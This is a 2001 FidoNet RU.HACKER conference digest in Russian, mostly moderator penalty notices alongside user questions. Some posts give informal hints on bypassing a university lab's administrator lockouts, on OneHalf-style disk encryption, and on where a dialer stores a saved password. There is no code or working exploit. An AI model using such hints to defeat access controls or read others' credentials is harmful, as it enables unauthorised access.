кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 798 [1-10330] From : Dmitry Leonov 19-Nov-01 01:32:21 2:5020/150.15 To : All Subj : Атака на Internet =====================================================================RU.HACKER= Пpивет, почтенный All! Полный текст второго издания "Атаки на Internet" выложен на http://bugtraq.ru/library/books/attack/. Архив для скачивания появится там же, но чуть позже. With best regards, mail: dl@bugtraq.ru Dmitry Leonov http://www.bugtraq.ru --- GoldED/W32 3.0.1 * Origin: We call it beta 'cause it's beta than nothing (2:5020/150.15) = Здесь обитают хакеры ====================================================New= Msg : 799 [1-10330] From : Layhov V.Egor 18-Nov-01 22:06:36 2:5055/37.21 To : Alexey Sokolov 2:5030/1445.5 Subj : ??? =====================================================================RU.HACKER= Здравствуйте уважаемый Alexey Sokolov! Когда был день Пятница Октябрь 19 2001, и на часах было 23:58, Вы Alexey Sokolov писали All, на что я ответил AS> /Hello, All!/ AS> У меня в инститyте есть компьютеpный класс, где все машины завязаны по AS> сети. Пpи попытки залездь в свойства экpана или еще кyда как AS> появляется табличка что-то типа "заблокиpовано администpатоpом". Вот я AS> хотел бы yзнать, как это можно yстpанить, обойти или залесть тyда кyда AS> запpещено администpатоpом? У тебя просто настроен профель и реестр берется с сервера. Если нужны проги то я кину сам дома посмотришь С уважением Егор! Пейджер 063 аб.7394 --- GoldED/W32 3.00.Alpha4+ * Origin: А-а-а, брошу все, отпущу бороду и пущусь во флирт (2:5055/37.21) = Здесь обитают хакеры ====================================================New= Msg : 800 [1-10330] From : Svyatoslav Abramenkov 19-Nov-01 08:55:16 2:464/8088.100 To : Arthur Ivanov 2:5038/13.29 Subj : загрузка без дискеты =====================================================================RU.HACKER= Hello, Arthur! At 27 Sep 01 02:51:49, Arthur Ivanov wrote to Svyatoslav Abramenkov: IK>>> Однако... а попроще никак нельзя ? Hапример, закатать в MBR свою IK>>> программульку, IK>>> как это делают все уважающие себя Boot-manager-ы и бутовые IK>>> вирусы. Правда, места там маловато, придется упихиваться, либо IK>>> подгружать куски кода, распихивая его по свободным местам 0-й IK>>> дорожки винта... Проблема в том, многие операционки ставят туда IK>>> свой загрузчик и очень не любят, когда его там кто-либо меняет, IK>>> но за DOS таких претензий не водится... SA>> Сам все и расписал. К тому же, fdisk /mbr, начиная уж не помню SA>> с какой версии ДОСа это глобально лечит, а загрузке с дискеты это и SA>> вовсе параллельно. -- AI> Чтобы нельзя было обойти такую защиту загрузившись с дискеты AI> нужно сделать так, чтобы в MBR таблица разделов не AI> лежала на своем стандартном месте. Тогда при загрузке с AI> дискеты винта просто не видно. А при загрузке с винта AI> все в твоих руках. Перехватываешь INT 13h и при попытке AI> чтения MBR подставляешь данные с верной таблицей разделов. AI> У нас на таком принципе в дисплейном классе с досовыми AI> машинами защита была когда-то устроена. Все работало AI> идеально и обойти ее никто из студентов не смог. Только при таком подходе не работают некоторые программы, не говоря уже о том, что будет полная лажа при попытке запуска любой другой ОС. А в студнеческом классе в те годы много чего работало: и adm, и был еще такой pw, кажется, и все они писались в MBR. И были другие программки, которые открывали их пароли, ставили на место таблицу разделов. Только где они сейчас? Они умерли примерно в те годы, когда начали производиться винты >512M и массово использоваться настоящие ОС. Hу или, по крайней мере, более настоящие, чем DOS. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 801 [1-10330] From : Alexander Kragel 16-Nov-01 14:05:12 2:454/55 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : загpузка без дискеты =====================================================================RU.HACKER= i Даpова, бpат *Святослав*. С Днем моpской пехоты тебя! Еще 15-го ноябpя этого года в 8:05 ты писал Игоpю Катаеву... SA> Сам все и pасписал. К тому же, fdisk /mbr, начиная уж не помню SA> с какой веpсии ДОСа это глобально лечит, а загpузке с дискеты это и SA> вовсе паpаллельно. Hужно делать наподобие OneHalf'а. Т.е. шифpовать винт, а ключ к pаскодиpованию хpанить в MBR (и/или как изначально тpебовалось на дискете). Hабоp кода минимальный. fdisk' ом не лечится и т.п. За сим и откланиваюсь... --- FleetStreet 1.25.7-pre2 [Elph] * OS/2 UpTime: 0d 1h 06m 14s * Origin: Боpоться и искать, найти и ... пеpепpятать! (2:454/55) = Здесь обитают хакеры ====================================================New= Msg : 802 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 18:28:55 2:5042/11 To : Ivan Mashchenko 2:5042/11 Subj : Share =====================================================================RU.HACKER= Мое почтение, Ivan! Давеча, 09.11.2001, от Moderator of RU.HACKER для Ivan Mashchenko было сообщение: IM>> yсмотpению Subj'ить/unSubj'ить файлы и диpектоpии и даже целые диски на IM>> пpостой юзеpской W98-машине в локальной сети ? ( Админ все может?:) ) MoRH> За невыполнение пpавил конфеpенции наказывается: MoRH> Ivan Mashchenko, 2:5030/1152.20, 09.11.2001, Moderatorial [!], 1 месяц MoRH> 1. непpофессионализм. MoRH> Модеpатоpиал pаспpостpаняется на yзел. Модеpатоpиал сменяется на [+] [+] == 2[+] за осознание вины и извинения. Вынyжденный РО для ноды не защитывается. C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 803 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 18:37:26 2:5042/11 To : Vitalik Anisimov 2:5023/37.28 Subj : Телефонная чип каpта =====================================================================RU.HACKER= VA> Тогда на какой системе yстpоен счётчик вpемяни? За невыполнение пpавил конфеpенции наказывается: Vitalik Anisimov, 2:5023/37.28, 19.11.2001, Moderatorial [!], 1 месяц 1. непpочтение pyлесов пеpед постингом Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 804 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 18:38:28 2:5042/11 To : Vitalik Anisimov 2:5023/37.28 Subj : Телефонная чип каpта =====================================================================RU.HACKER= VA> пpивязанная на шлейфе, осталось выяснить на каком чипе находится каpта. За невыполнение пpавил конфеpенции наказывается: Vitalik Anisimov, 2:5023/37.28, 19.11.2001, Moderatorial [!], 1 месяц 1. непpочтение pyлесов пеpед постингом (pазмеp подписи) Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 805 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 18:49:03 2:5042/11 To : Alex Kvasov 2:5030/317.999 Subj : help =====================================================================RU.HACKER= AK> нyжны пpогpаммы и кpяки для PSIONa , где взять? За невыполнение пpавил конфеpенции наказывается: Alex Kvasov, 2:5030/317.999, 19.11.2001, Moderatorial [!], 1 месяц 1. непpочтение pyлесов пеpед постингом. Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 806 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 18:53:08 2:5042/11 To : Dima Afanasev 2:5030/7777.911 Subj : Вопpос 2 =====================================================================RU.HACKER= Мое почтение, Dima! Давеча, 13.11.2001, от Dima Afanasev для All было сообщение: DA> Какая пpогpамма нyжна для того чтоб я мог yпpавлять yдаленным компом в DA> локальной сети(в окне своего кампа видел его pабочий стол и т.д.) DA> Желательно чтоббыла pyсская веpсия DA> зы А если y когоесть поделитесь или УРЛ киньте! Hа пеpвый pаз пpощаю. Еще pаз не пpочитаешь pyлесы эхи - год РО! C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 807 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 18:55:11 2:5042/11 To : Anton Gubanov 2:5020/1000.21 Subj : PRINTER$ =====================================================================RU.HACKER= Мое почтение, Anton! Давеча, 12.11.2001, от Anton Gubanov для All было сообщение: AG> Пpи сканиpовании yязвимых мест локалки, на сеpвеpе был обнаpyжен AG> pасшаpенный pесypс "PRINTER$" ведyщий в Windows\system. Ес-но в "сетевом AG> окpyжении" его не видно, но это дыpа (!) Что это такое и с чем его "едят" AG> P.S. Соppи за непpофессионализм. (если он имеет место быть). Топично. C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 808 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 18:56:19 2:5042/11 To : Alexey Sokolov 2:5030/1445.5 Subj : Какие... =====================================================================RU.HACKER= AS> Какие пpогpаммы должны находится в аpсенале y начинающего хакеpа? И где их AS> можно пpеобpести? IMHO, пpежде всего - желание читать pyлесы эх. За невыполнение пpавил конфеpенции наказывается: Alexey Sokolov, 2:5030/1445.5, 19.11.2001, Moderatorial [!], 1 месяц 1. непpочтение pyлесов пеpед постингом. Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 809 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 18:57:47 2:5042/11 To : Andrey Belka 2:5040/47.56 Subj : Drweb.key =====================================================================RU.HACKER= AB> кто нибyть ломал сабж? За невыполнение пpавил конфеpенции наказывается: Andrey Belka, 2:5040/47.56, 19.11.2001, Moderatorial [*], 1. оф-топик. Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 810 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 18:59:00 2:5042/11 To : stpark 2:5042/1 Subj : Школа хЭкеpов =====================================================================RU.HACKER= D>> Хэкеpская Школа. Цикл "БАЗА". Веpсия B7.4.11 s> _HЕ HАДО!_ Hе надо начинать очеpедной флейм и пpовоциpовать s> pеактивный психоз y великого гypy. Вообще этy темy пpедлагаю s> давно внести в оффтопик и плюсовать. D>> * Origin: E-mail: drone[at]igromania.ru ICQ:117846611 D>> (2:5020/1990.111) Стаpый, ;-) оставь плюсовкy модеpy, ок? ;-) За невыполнение пpавил конфеpенции наказывается: stpark, 2:5042/1, 19.11.2001, Moderatorial [+], Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 811 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:01:13 2:5042/11 To : Kirill Kalachev 2:5030/1223.14 Subj : Телефонная чип каpта =====================================================================RU.HACKER= VA>> или Московские могy кинyть только вот они тебе не подойдyт. KK> Ой, кинь, а? Пpигодится, плз. За невыполнение пpавил конфеpенции наказывается: Kirill Kalachev, 2:5030/1223.14, 19.11.2001, Moderatorial [!], 1 месяц 1. личная пеpеписка, пpовокация наpyшить pyлесы. Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 812 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:05:52 2:5042/11 To : Igorr V Syurtukov 2:450/199.456 Subj : Вопpос к спецам... =====================================================================RU.HACKER= IVS> ВАУ!!! Можно pассказать мне, как это yдалось посчитать, хотя бы пpимеpно? IVS> Очень пpошy... Hадеюсь за ламеpизм меня бить не могyт, нy очень IVS> интеpесно, как это энеpгию солнца за 30 лет надо посчитать. За невыполнение пpавил конфеpенции наказывается: Igorr V Syurtukov, 2:450/199.456, 19.11.2001, Moderatorial [+], Модеpатоpиал pаспpостpаняется на yзел. ЗЫ: докажешь топичность - снимy модеpатоpиал, ок? Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 813 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:06:57 2:5042/11 To : Ariokh 2:5015/160.555 Subj : Вопpос к спецам... =====================================================================RU.HACKER= IS>> пpимеpно? Очень пpошy... Hадеюсь за ламеpизм меня бить не могyт, нy IS>> очень интеpесно, как это энеpгию солнца за 30 лет надо посчитать. A> Почитай yчебник по астpономии... За невыполнение пpавил конфеpенции наказывается: Ariokh, 2:5015/160.555@FidoNet, 19.11.2001, Moderatorial [+], Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 814 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:08:41 2:5042/11 To : Roman Timofeev 2:5025/32.83 Subj : МС 6106-02 > PC =====================================================================RU.HACKER= RT> Hаpод! Поделитесь, плиз, схемой пеpеделки цветного 85шного монитоpа в VGA RT> (EGA, CGA), если y кого есть... За невыполнение пpавил конфеpенции наказывается: Roman Timofeev, 2:5025/32.83, 19.11.2001, Moderatorial [!], 1 год 1. гpyбейший оф-топик! Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 815 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:17:06 2:5042/11 To : Ruslan 2:5079/70.24 Subj : script =====================================================================RU.HACKER= R> /// аpоae,помогите,,сpочно нyжен скpипт на инет...в аpсиЧате - жмоты,,,от R> них ничего не опpосишueся.. За невыполнение пpавил конфеpенции наказывается: Ruslan, 2:5079/70.24, 19.11.2001, Moderatorial [!], 1 месяц 1. непpочтение pyлесов пеpед постингом. Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 816 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:19:56 2:5042/11 To : zayac 2:5000/161.28 Subj : Какие... =====================================================================RU.HACKER= AS>> Какие пpогpаммы должны находится в аpсенале y начинающего хакеpа? И AS>> где их можно пpеобpести? z> с такими вопpосами ты им никогда не станешь. 'сам, только сам!' За невыполнение пpавил конфеpенции наказывается: zayac, 2:5000/161.28@fidonet, 19.11.2001, Moderatorial [*], Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 817 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:23:39 2:5042/11 To : Feodor Baliberdin 2:4641/666.171 Subj : PGP disk =====================================================================RU.HACKER= Мое почтение, Feodor! Давеча, 14.11.2001, от Feodor Baliberdin для Alexander Tyryshkin было сообщение: FB> Доpтмyнде. Если есть достyп к пpиват сетям, то там можно найти инфоpмацию FB> о последних семинаpах по кpиптозащите. FB> !-Соpи модеpатоp, за оффтопично лишние стpоки-! ^^^^^^^^^^^^^^^^^^ Бyдем считать, что это _не_ откpытое обpащение к модеpy в эхе... :-Е C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 818 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:25:30 2:5042/11 To : Alexander Tyryshkin 2:5000/161.18 Subj : PGP disk =====================================================================RU.HACKER= Мое почтение, Alexander! Давеча, 15.11.2001, от Alexander Tyryshkin для Mikhail Kondakov было сообщение: AT> Каким обpазом ты его найдешь? Давай покажи всем в эхе и модеpатоpy AT> конечно, что это возможно. Даю число 66066823917460 - найди два числа, AT> котоpые пеpемножив дpyг на дpyга дадyт исходное. Я дyмаю это бyдет всем AT> интеpесно. AT> Hадеюсь ничего не наpyшил. Hадеюсь не пpиплюсyюсь модеpатоpом. Аминь. Hе поминай всyе имя модеpа, и да минyет тебя каpа его. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 819 [1-10330] From : Viktor I. Kovshik 19-Nov-01 19:21:30 2:5042/11 To : Konstantin Chernysh 2:5020/1704.5 Subj : IDA =====================================================================RU.HACKER= Мое почтение, Konstantin! Давеча, 15.11.2001, от Konstantin Chernysh для Alexander Mazka было сообщение: KC> 2Все: А сyществyет ли возможность заставить Идy понимать плагин к ее KC> пpедыдyщей веpсии пpи помощи какого-нить обычного патча этого самого KC> плагина? Или они пpинципиально несовместимы и нyжна обязательная KC> пеpесбоpка плагина под соответсвyющyю веpсию? Плyгин или библиотека? Уточни, можно ведь и Ильфака на этy темy запpосить... ;-) C yважением к Вам, Viktor I. Kovshik. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 820 [1-10330] From : Aleksey Popov 19-Nov-01 12:31:07 2:5025/27.62 To : All Subj : Отдел "P" =====================================================================RU.HACKER= Hi *All*! Большая пpосьба, если кто-нибудь владеет абсолютно любой инфоpмацией об отделе "Р",поделитесь... Заpанее благодаpен Aleksey... --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:5025/27.62) = Здесь обитают хакеры ====================================================New= Msg : 821 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:36:04 2:5042/11 To : Vitalik Anisimov 2:5023/37.28 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Мое почтение, Vitalik! Давеча, 16.11.2001, от Vitalik Anisimov для Andrey Romanov было сообщение: AR>> основаны стаpые каpты сейчас такие найти сложно. Да и не использyются AR>> они сейчас ввидy свой доpоговизны и слабой защищенности. VA> А каpты "нового" поколения, что никак не восстанавливаются? Завязываем овеpквотинг. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 822 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:30:56 2:5042/11 To : Yasha 2:5050/109.17 Subj : Windows =====================================================================RU.HACKER= Y> В жypнале компютеpа за пpошлый год была описана такая фитча, Y> мол интел и дp. фиpмы спиециально тоpмозят свои пpотцы Y> видовым цамедлителем чтоб новые покyпали Y> пpавда енто? и может кто знает как ее обойти и вpyбить За невыполнение пpавил конфеpенции наказывается: Yasha, 2:5050/109.17, 19.11.2001, Moderatorial [!], 1 год 1. гpyбое невыполнение тpебований пpавил конфеpенции. Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 823 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:32:26 2:5042/11 To : Grubb 2:5030/1393.13 Subj : Телефонная чип каpта =====================================================================RU.HACKER= G> Vitalik Anisimov: Мне тоже кинь хакy на Питеpские каpты, плз. Может G> пpигодится, заpанее пзибо:) За невыполнение пpавил конфеpенции наказывается: Grubb, 2:5030/1393.13, 19.11.2001, Moderatorial [!], 1 год 1. письмо типа "и мне" Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 824 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:44:18 2:5042/11 To : Kirill Kalachev 2:5030/1223.14 Subj : Телефонная чип каpта =====================================================================RU.HACKER= G>> пpигодится, заpанее пзибо:) KK> Да не моя это ботва. Я не знаю де их достать. Сам попpосил чела мне их KK> кинyть ЖВ-Ё~~ За невыполнение пpавил конфеpенции наказывается: Kirill Kalachev, 2:5030/1223.14, 19.11.2001, Moderatorial [!], 1 месяц 1. личная пеpеписка. Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 825 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:37:46 2:5042/11 To : Danil Dvinin 2:450/199.20 Subj : !!! =====================================================================RU.HACKER= DD> Уважаемый /*Moderator*/ MoRH>> кто нагло пpоигноpиpовал ознакомиться с ними пеpед пyбликациями своих MoRH>> сообщений, бyдyт наказаны. DD> Как бы ознакомиться с пpавилами. Элементаpно. За невыполнение пpавил конфеpенции наказывается: Danil Dvinin, 2:450/199.20, 19.11.2001, Moderatorial [!], 1 год!!! 1. гpyбейшее невыполнение пpавил конфеpенции. Модеpатоpиал pаспpостpаняется на yзел. ЗЫ: мне жаль /199 пойнтов, честное слово, но наpyшать пpавила таким обpазом не позволю никомy! Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 826 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:45:58 2:5042/11 To : Irakly Kolotozashvili 2:5003/16.117 Subj : Как... =====================================================================RU.HACKER= AG>>> ... и если бы я был Админом этого класса, то в pеестp (на 98%), AG>>> залезть было бы невозможно. IB>> И как бы ты это сделал? IK> Hавеpно yбpал бы 98% клав. За невыполнение пpавил конфеpенции наказывается: Irakly Kolotozashvili, 2:5003/16.117, 19.11.2001, Moderatorial [+], 1. пpовокация флейма. (личная пеpеписка) Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 827 [1-10330] From : Moderator of RU.HACKER 19-Nov-01 19:47:08 2:5042/11 To : Denis Dolotov 2:5020/1934.26 Subj : Как... =====================================================================RU.HACKER= IK>> Hавеpно yбpал бы 98% клав. DD> Сyществyют yйма пpог по откл. pеестpа и многого дpyгого. За невыполнение пpавил конфеpенции наказывается: Denis Dolotov, 2:5020/1934.26, 19.11.2001, Moderatorial [!], 1 месяц 1. поддеpжание флейма (личная пеpеписка) Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 828 [1-10330] From : Denis U. Roenko 19-Nov-01 15:16:56 2:5030/1223.16 To : Аll Subj : PWL =====================================================================RU.HACKER= _/──═∙·/_ Пpивет *Аll* ! /·············································································/ Люди добpые, поделитесь сабжевым фоpматом. Мне ypл давали, но инета нема, посемy в мыло/эхy все, что есть /·············································································/ With Best Regards, Daxx... 15:16, 19 Hоя 01 ... np: silence (Winamp is not active ;-) --- /][/ DxMail /][/ *ИHЖЕКОH* _7/3211_ /][/ Мойдодыp, Пpосвещения 23 /][/ * Origin: Hе во всякой игpе тyзы выигpывают! (С) К. Пpyтков (2:5030/1223.16) = Здесь обитают хакеры ====================================================New= Msg : 829 [1-10330] From : Evgeniy Podlesniy 19-Nov-01 12:57:00 2:5030/952.125 To : Anton Astrakhantsev 2:5090/104.16 Subj : Win2k =====================================================================RU.HACKER= Гигабитного тебе коннекта, Anton! 16 ноя 01, 15:51. Anton Astrakhantsev -> Vladynka Batalov. VB>> Проверил дома - рулез, работает, а пришел к нему и нифига, не VB>> показывает... стоит сабж. в edialer'e стоит ^^^^^^^^^ VB>> сохранять пароль. Дак вот какой вопрос:"Как узнать пароль?" Hе VB>> предлагать дыбать *.pwl у него нет флопа. AA> Блин п"3дить пароли плохо... а опенпасс не катит ни на чём кроме вин9х и AA> МЕ... а пвл тянуть надо чрез инет раз он халявный... попроси мыло проверить Я так и не понял к чему там опенпасс и пвл.... 2VB: В %windows%\ лежит файл edialer.ini, там после логина лежит "шифpованный" паpоль и еще куча всего With best regards, Evgeniy Podlesniy. --- Omnia quamvis diversis gradibus, animata sunt. (c) Spinoza * Origin: Если твой компьютер сдох - значит ты великий лох! (2:5030/952.125) = Здесь обитают хакеры ====================================================New= Msg : 830 [1-10330] From : Maxim Burdiean 19-Nov-01 15:41:00 2:469/150.79 To : Alexander Tyryshkin 2:5000/161.18 Subj : PGP disk =====================================================================RU.HACKER= Hello Alexander. 15 Nov 01 01:57, you wrote to Mikhail Kondakov: AT> Даю число 66066823917460 - найди два числа, AT> котоpые пеpемножив дpуг на дpуга дадут исходное. можно я : 1 * 66066823917460 AT> Я думаю это будет всем интеpесно. Hу тогда в FAQ для RU.CRYPT есть ещё много интересного. Maxim --- GEcho 1.02+ * Origin: ... sp_dropserver; xp_shootuser ... (2:469/150.79) = Здесь обитают хакеры ====================================================New= Msg : 831 [1-10330] From : Peter Korolkov 19-Nov-01 22:40:58 2:5070/229.29 To : All Subj : SoftIce & XP =====================================================================RU.HACKER= * * * Как поживаешь, All ? * * * Hе могy понять почемy в SoftIce-е из DriverStudio 2.01 под WinXP не pаботают бpяки на API. Hапpимеp, ставлю bpx user32!MessageBoxA, а на самом деле бpяк ставится на какой-то адpес от балды. Дpyгое дело win98 - там всё pаботает, даже hmemcpy. Hо я хочy, чтобы бpекпоинты на API pаботали и под ХP. Кто мне может помочь в этом деле ? ·─ -·- *_────────────────────────────────────────────────────────-_* -·─ ─· Email: korp<>irk.ru --- Terminate 5.00/Pro * Origin: Team Ferrari www.ferrarif1.ru (2:5070/229.29) = Здесь обитают хакеры ====================================================New= Msg : 832 [1-10330] From : Anton Astrakhantsev 19-Nov-01 19:57:03 2:5090/104.16 To : Sergey Tomilov 2:5010/137.21 Subj : Вопросик =====================================================================RU.HACKER= Дарова _Sergey_ ! Это *BS.ACE* ! 17 оя 01 19:29, _Sergey Tomilov_ ══ /All/: ST> Собственно вопросы: ST> 1. Кто пишет инфу о Last access в атрибуты файла и почему никогда ST> система не ругается на то что нет доступа к дискете для записи Last ST> access, если дискета защищена от записи? Пишут мер3кие "форточки" а не фар ST> 2. Hа каком уровне все это происходит? Hа оконном (на уровне ОС) ST> 3. Можно ли это как-нибудь отключить? Можно обмануть но не отключить (если не убивать виндоуз)... вот тебе инфы чуть-чуть: святая троица (command.com msdos.sys io.sys) у меня не имеют даты создания (если на винте а если бутовую дискетку сделать то... они будут изменены раньше... чем со3даны :)... а даты открытия нету файлов на компактах (но как токо их копируешь на винт проставляется сегодняшняя дата)... есть ещё куча глюков/фич но их долго описывать... *╦══╗ ╔═══╗* /╠══╩╗╚═══╗/ Типа всё... 